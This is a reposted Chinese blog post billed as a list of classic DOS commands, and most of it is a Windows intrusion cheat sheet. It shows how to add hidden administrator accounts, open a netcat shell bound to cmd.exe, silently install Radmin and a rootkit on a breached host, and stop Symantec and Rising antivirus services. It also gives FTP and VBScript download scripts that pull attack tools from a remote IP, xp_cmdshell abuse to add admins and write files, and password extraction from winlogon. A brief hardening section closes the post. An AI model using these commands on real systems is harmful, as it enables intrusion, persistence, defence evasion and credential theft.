天天看点

一些经典DOS命令

(1) 运行cmd命令

l       通过在“运行”菜单中执行cmd或者command指令。

l       通过程序的附件执行“命令提示符”

l       直接在反弹的shell中(一般是远程控制软件中)

说明:在有些情况下,管理员对cmd命令进行了限制,这就需要更换cmd.exe为其它一个名字,或者从本地上传一个文件上去。

(2) 创建目录:mkdir test

(3) 更换当前路径:cd  test

(4) 生成文件:netstat –an >netlog.txt

(5) 查看文件属性:dir /a /s

(6) 查找指定网络连接:netstat –an |find “80” /3389

(7) 给文件加上/还原属性:attrib –h-s-r-a

(8) 创建新文件夹: mkdir hacker

(9) 移动文件netlog.txt到hacker文件夹

l       move netlog.txt c:hacker\

l       move netlog.txt c:\test\hacker\

(10)添加新管理员hacker

net user hacker wshacker /add

net localgroup administrators hacker /add

net user hacker

net user hacker wshakcer!!

(11)使用nc命令

l       监听命令

netstat –an |find “8080”

nc -vv -l -p 8080 / nc -vv -l -p 8080

nc -l  -p port>log.txt

l       程序定向

nc -l -p 5277 -t -e cmd.exe

在对方机器上运行,使其成为一台telnet服务器.

l       扫描对方端口

nc -v -ip port

eg nc -v 172.16.81.1 80

l       扫描对方tcp端口

nc -v -z ip port -port

l       扫描对方udp端口

nc -v -z -u ip port-port

l       上传文件

本地机器上执行:nc -v -n ip port<x:\svr.exe

远程机器上执行:nc -v -l -p port >y:\svr.exe

(12)查看系统时间:net time  net view /net session /net use

(13)使用at命令:

at 查看当前所有列表

at 9:01 “net user aspnet  wshakcer /add ”

net time

说明该命令一般是配合net time命令使用

(14)查看远程终端连接情况:query user /quser

(15)注销远程终端用户:logoff 1/2/3

(16)命令模式安装radmin远程控制软件

前提:将radmin的三个服务端文件(admdll.dll,raddrv.dll,r_server.exe)放入一个文件夹,并且已经获得了被入侵机器的管理员密码。

copy *.*  \\192.168.45.219\admin$\system32\

然后执行命令:

netstat -an |find "4899"

net stop r_server

r_server.exe /pass:wshacker /port:4899 /save  /silence

r_server.exe /install /silence

net start r_server

(17)安装rootkit

将ntboot.exe ntboot.dll拷入系统目录,然后执行ntboot –install命令,rootkit对80端口有效,尤其对提供web服务的端口。

客户端调用比较简单:

cli->ip地址->80端口

(18)停止和启动服务。

Net stop /net start  “服务名称”

以下命令停止杀毒软件

net stop "Symantec AntiVirus"

net stop "Symantec AntiVirus Definition Watcher"

net stop "Symantec Event Manager"

net stop "Symantec Settings Manager"

net stop "System Event Notification"

(19)获取网络配置情况:ipconfig /all

(20)使用脚本下载

echo open 192.168.45.219>b

echo ftp>>b

echo bin>>b

echo get radmin.exe>>b(可以是一系列的可执行文件)

echo bye >>b

ftp -s:b

del b

echo open 192.168.45.219 >1

echo user bin bin >>1

echo bin >>1

echo get wt.exe >>1

echo bye >>1

ftp -n -s:1

del 1

(21)dl.vbe

echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe

echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe

echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe

echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe

cscript dl.vbe [url]http://192.168.45.219/tools/AdmDll.dll[/url] AdmDll.dll

cscript dl.vbe [url]http://192.168.45.219/tools/raddrv.dll[/url] raddrv.dll

cscript dl.vbe [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe

cscript dl.vbe [url]http://192.168.45.219/tools//mt.exe[/url] mt.exe

cscript dl.vbe [url]http://192.168.45.219/tools/wt.exe[/url] wt.exe

(22). iget.vbe

net stop "RsRavMon Service"

net stop "Rising Personal Firewall Service"

net stop "Rising Process Communication Center"

echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe

echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe

echo Set xPost = createObject("Microsoft.XMLHTTP") >>iget.vbe

echo xPost.Open "GET",iRemote,0 >>iget.vbe

echo xPost.Send() >>iget.vbe

echo Set sGet = createObject("ADODB.Stream") >>iget.vbe

echo sGet.Mode = 3 >>iget.vbe

echo sGet.Type = 1 >>iget.vbe

echo sGet.Open() >>iget.vbe

echo sGet.Write(xPost.responseBody) >>iget.vbe

echo sGet.SaveToFile iLocal,2 >>iget.vbe

dir iget.vbs

cscript iget.vbe [url]http://192.168.45.219/tools/AdmDll.dll[/url] AdmDll.dll

cscript iget.vbe [url]http://192.168.45.219/tools/raddrv.dll[/url] raddrv.dll

cscript iget.vbe [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe

cscript iget.vbe [url]http://192.168.45.219/tools/mt.exe[/url] mt.exe

cscript iget.vbe [url]http://192.168.45.219/tools/wt.exe[/url] wt.exe

cscript iget.vbe [url]http://192.168.45.219/tools/ntboot.exe[/url] ntboot.exe

cscript iget.vbe [url]http://192.168.45.219/tools/ntboot.dll[/url] ntboot.dll

cscript iget.vbe [url]http://192.168.45.219/tools/server.exe[/url] server.exe

cscript iget.vbe [url]http://192.168.45.219/tools/lsaext.dll[/url] lsaext.dll

cscript iget.vbe [url]http://192.168.45.219/tools/PwD.exe[/url] PwD.exe

cscript iget.vbe [url]http://192.168.45.219/tools/sfind.exe[/url] sfind.exe

cscript iget.vbe [url]http://192.168.45.219/tools/fp.exe[/url] fp.exe

cscript iget.vbe [url]http://192.168.45.219/tools/pulist.exe[/url] pulist.exe

cscript iget.vbe [url]http://192.168.45.219/tools/pskill.exe[/url] pskill.exe

(23)使用软件下载

wt down [url]http://192.168.45.219/tools/AdmDll.dll[/url]

wt down [url]http://192.168.45.219/tools/regsrc.exe[/url]

wt down [url]http://192.168.45.219/tools/raddrv.dll[/url]

mt -netget [url]http://192.168.45.219/tools/ntboot.dll[/url] ntboot.dll

mt -netget [url]http://192.168.45.219/tools/ntboot.exe[/url] ntboot.exe

mt -netget [url]http://192.168.45.219/tools/regsrc.exe[/url] regsrc.exe

mt -netget [url]http://192.168.45.219/tools/PwD.exe[/url] PwD.exe

(24)在网站上复制文件

copy c:\tmp\*.exe c:\winnt\system32\inetsrv\data\

使用网页木马的文件上传功能。

(25)使用SQL Server 2000的xp_cmdshell

exec master.dbo.xp_cmdshell  ‘命令’ --执行命令

use master –使用哪一个数据

exec master.dbo.xp_cmdshell  'net user aspnet wshacker /add'

exec master.dbo.xp_cmdshell  'net localgroup administrators asp2net /add'将脚本通过网页提交

exec xp_cmdshell 'echo set fso1=createobject("scripting.filesystemobject")>c:\read.vbs'

exec xp_cmdshell 'echo Set WshShell = Wscript.CreateObject("Wscript.Shell")>>c:\read.vbs'

exec xp_cmdshell 'echo spa=WshShell.Environment("process")("windir") >>c:\read.vbs'

exec xp_cmdshell 'echo set fil =fso1.opentextfile(spa & "\system32\aa.txt") >>c:\read.vbs'

exec xp_cmdshell 'echo  do while not fil.atendofstream>>c:\read.vbs'

exec xp_cmdshell 'echo  nr=fil.readline>>c:\read.vbs'

exec xp_cmdshell 'echo  if left(nr,4)="Path" then>>c:\read.vbs'

exec xp_cmdshell 'echo  pa=mid(nr,instr(nr,")")+3,len(nr)-instr(nr,")")-3)>>c:\read.vbs'

exec xp_cmdshell 'echo  exit do>>c:\read.vbs'

exec xp_cmdshell 'echo  end if>>c:\read.vbs'

exec xp_cmdshell 'echo  loop>>c:\read.vbs'

exec xp_cmdshell 'echo  set fil1 =fso1.opentextfile(pa&"\dd.asp",2,true)>>c:\read.vbs'

exec xp_cmdshell 'echo  fil1.writeline "<%response.write request.servervariables(""APPL_PHYSICAL_PATH"")%>">>c:\read.vbs'

 (26)查找用户的密码:

l       使用pulist.exe查看用户的进程,找到winlogon的PID.

l       然后运行findpass.exe 域名(机器名) 用户名 PID

例如: findpass.exe a administrator 204

mt –findpass

[url]ftp://192.168.99.254[/url]

(27)使用ps

l       显示所有进程

ps /a

dir *.exe>exeback.txt & dir *.dll>dllback.txt

ps.exe /a /m >nowdlls.txt

(28)压缩文件

rar a -r myrar d:\sinba

(29)计算机管理控制台程序

compmgmt.exe

dcomcnfg.exe 组件服务程序

devmgmt.exe 设备管理器程序

fsmgmt.exe 共享文件管理

lusrmgr.msc 本地用户和组

eventvwr.msc 日志管理器

ht文件

ht -fku

ht -key  mima

ht -ps

htk -fku

htk -key 218123409252

htk -ps

htk -pslist

htk -pass

htk -fpass

htk -pss 192.168.1.6

htk -s 192.168.1.6 -show -run

htk -share -add 211.72.212.81 admin$

htk -share -add 211.72.50.10  admin$

安全防护

(1) 查看运行服务与端口

fport /p

(2)查看开放的文件及其进程

handle.exe([url]http://www.sysinternals.com/ntw2k/freeware/handle.shtml.[/url])

 handle -p iexplore handle

(3)进行登陆等时间的审计(gpedit)

(4)严格安全日志的管理(应用程序日志、系统日志、安全时间日志)

严格限制%SystemRoot%\system32\config目录访问权限,仅限管理员访问

eventvwr.msc更改日志文件的默认大小

(5)去掉默认文件共享

HKey_Local_Machine\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters

新建DWORD键“AutoShareServer”值为0

net share

(6)加密用户所在文件的临时目录temp

C:\Documents and Settings\<username>\Local Settings

(7)清楚页面文件

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management 将ClearPageFileAtShutdown键值设置为1

(8)严格控制应用程序的访问权限

使用win2000 资源AppSec

 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/46571

继续阅读